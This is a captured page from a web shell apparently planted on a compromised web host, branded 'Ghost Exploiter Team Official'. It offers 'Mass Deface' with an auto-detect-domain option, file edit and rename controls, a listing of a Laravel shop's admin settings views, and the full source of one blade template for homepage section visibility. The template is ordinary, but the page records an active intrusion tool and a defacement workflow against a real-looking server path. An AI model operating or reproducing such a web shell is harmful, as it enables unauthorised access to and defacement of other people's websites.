webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
resources
/
views
/
back
/
settings
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
sitemap
--
ren
announcement.blade.php
7.139KB
edt
ren
cookie.blade.php
3.262KB
edt
ren
email.blade.php
12.313KB
edt
ren
maintainance.blade.php
4.651KB
edt
ren
payment.blade.php
74.497KB
edt
ren
section.blade.php
39.906KB
edt
ren
sms.blade.php
9.06KB
edt
ren
social.blade.php
8.079KB
edt
ren
system.blade.php
60.466KB
edt
ren
@extends('master.back') @section('content') <div class="container-fluid"> <!-- Page Heading --> <div class="card mb-4"> <div class="card-body"> <div class="d-sm-flex align-items-center justify-content-between"> <h3 class="mb-0 bc-title"><b>{{ __('Visibility') }}</b></h3> </div> </div> </div> <!-- Form --> <div class="row"> <div class="col-xl-12 col-lg-12 col-md-12"> <div class="card o-hidden border-0 shadow-lg"> <div class="card-body "> <!-- Nested Row within Card Body --> <div class="row"> <div class="col-xl-3 col-lg-3"> <div class="nav flex-column m-3 theme_change nav-pills nav-secondary" id="v-pills-tab" role="tablist" aria-orientation="vertical"> <a class="nav-link active" data="theme1" data-toggle="pill" href="#hone">{{ __('Home One') }}</a> <a class="nav-link" data="theme2" data-toggle="pill" href="#htwo">{{ __('Home Two') }}</a> <a class="nav-link" data="theme3" data-toggle="pill" href="#hthree">{{ __('Home Three') }}</a> <a class="nav-link" data="theme4" data-toggle="pill" href="#hfour">{{ __('Home Four') }}</a> </div> </div> <div class="col-xl-9 col-lg-9"> <form class="admin-form" action="{{ route('back.setting.visible.update') }}" method="POST" enctype="multipart/form-data"> @csrf @include('alerts.alerts') <div id="tabs"> <!-- Tab panes --> <div class="tab-content"> <div id="hone" class="tab-pane active"><br> <div class="row justify-content-center"> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_slider" value="1" {{ $setting->is_slider == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Slider Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_three_c_b_first" value="1" {{ $setting->is_three_c_b_first == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 column banner First') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_popular_category" value="1" {{ $setting->is_popular_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Popular Categories') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_three_c_b_second" value="1" {{ $setting->is_three_c_b_second == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 column banner Second') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_t1_falsh" value="1" {{ $extra_settings->is_t1_falsh == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Flash Deal') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_highlighted" value="1" {{ $setting->is_highlighted == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Featured, Best Seller, Top Rated, New Product') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_popular_brand" value="1" {{ $setting->is_popular_brand == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Popular Brands') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_featured_category" value="1" {{ $setting->is_featured_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Featured Categories') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_two_c_b" value="1" {{ $setting->is_two_c_b == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Two column banner') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_two_column_category" value="1" {{ $setting->is_two_column_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Three column category') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_blogs" value="1" {{ $setting->is_blogs == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('blog Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_service" value="1" {{ $setting->is_service == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Service Section') }}</span> </label> </div> </div> </div> </div> <div id="htwo" class="tab-pane"><br> <div class="row"> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_slider" value="1" {{ $extra_settings->is_t2_slider == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Slider Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_service_section" value="1" {{ $extra_settings->is_t2_service_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Service Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_3_column_banner_first" value="1" {{ $extra_settings->is_t2_3_column_banner_first == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner First') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_new_product" value="1" {{ $extra_settings->is_t2_new_product == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('New Product Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_3_column_banner_second" value="1" {{ $extra_settings->is_t2_3_column_banner_second == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner Second') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_t2_falsh" value="1" {{ $extra_settings->is_t2_falsh == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Flash Deal') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_featured_product" value="1" {{ $extra_settings->is_t2_featured_product == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Featured Product Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_bestseller_product" value="1" {{ $extra_settings->is_t2_bestseller_product == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Bestseller Product Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_toprated_product" value="1" {{ $extra_settings->is_t2_toprated_product == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Top Rated Product Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_2_column_banner" value="1" {{ $extra_settings->is_t2_2_column_banner == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('2 Column Banner') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap" name="is_t2_three_column_category" value="1" {{ $extra_settings->is_t2_three_column_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Three Column Category') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_blog_section" value="1" {{ $extra_settings->is_t2_blog_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Blog Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t2_brand_section" value="1" {{ $extra_settings->is_t2_brand_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Brand Section') }}</span> </label> </div> </div> </div> </div> <div id="hthree" class="tab-pane"><br> <div class="row"> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_slider" value="1" {{ $extra_settings->is_t3_slider == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Slider Section') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_service_section" value="1" {{ $extra_settings->is_t3_service_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Service Section') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_3_column_banner_first" value="1" {{ $extra_settings->is_t3_3_column_banner_first == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner First') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_falsh" value="1" {{ $extra_settings->is_t3_falsh == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Flash Deal') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_popular_category" value="1" {{ $extra_settings->is_t3_popular_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Popular Category') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_3_column_banner_second" value="1" {{ $extra_settings->is_t3_3_column_banner_second == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner Second') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_pecialpick" value="1" {{ $extra_settings->is_t3_pecialpick == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Special Pick') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_brand_section" value="1" {{ $extra_settings->is_t3_brand_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Brand Section') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_three_column_category" value="1" {{ $extra_settings->is_t3_three_column_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Three Column Category') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_2_column_banner" value="1" {{ $extra_settings->is_t3_2_column_banner == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('2 Column Banner') }}</span> </label> </div> </div> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t3_blog_section" value="1" {{ $extra_settings->is_t3_blog_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Blog Section') }}</span> </label> </div> </div> </div> </div> <div id="hfour" class="tab-pane"><br> <div class="row"> <div class="col-lg-12"> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_slider" value="1" {{ $extra_settings->is_t4_slider == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Slider Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_featured_banner" value="1" {{ $extra_settings->is_t4_featured_banner == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Featured Banner') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_specialpick" value="1" {{ $extra_settings->is_t4_specialpick == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Special Pick') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_3_column_banner_first" value="1" {{ $extra_settings->is_t4_3_column_banner_first == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner First') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_flashdeal" value="1" {{ $extra_settings->is_t4_flashdeal == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Flash Deal') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_3_column_banner_second" value="1" {{ $extra_settings->is_t4_3_column_banner_second == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('3 Column Banner Second') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_popular_category" value="1" {{ $extra_settings->is_t4_popular_category == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Popular Category') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_2_column_banner" value="1" {{ $extra_settings->is_t4_2_column_banner == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('2 Column Banner') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_blog_section" value="1" {{ $extra_settings->is_t4_blog_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Blog Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_brand_section" value="1" {{ $extra_settings->is_t4_brand_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Brand Section') }}</span> </label> </div> <div class="form-group"> <label class="switch-primary"> <input type="checkbox" class="switch switch-bootstrap " name="is_t4_service_section" value="1" {{ $extra_settings->is_t4_service_section == 1 ? 'checked' : '' }}> <span class="switch-body"></span> <span class="switch-text">{{ __('Service Section') }}</span> </label> </div> </div> </div> </div> </div> <div> <div class="form-group d-flex justify-content-center"> <button type="submit" class="btn btn-secondary">{{ __('Submit') }}</button> </div> </form> </div> </div> </div> </div> </div> </div> </div> @endsection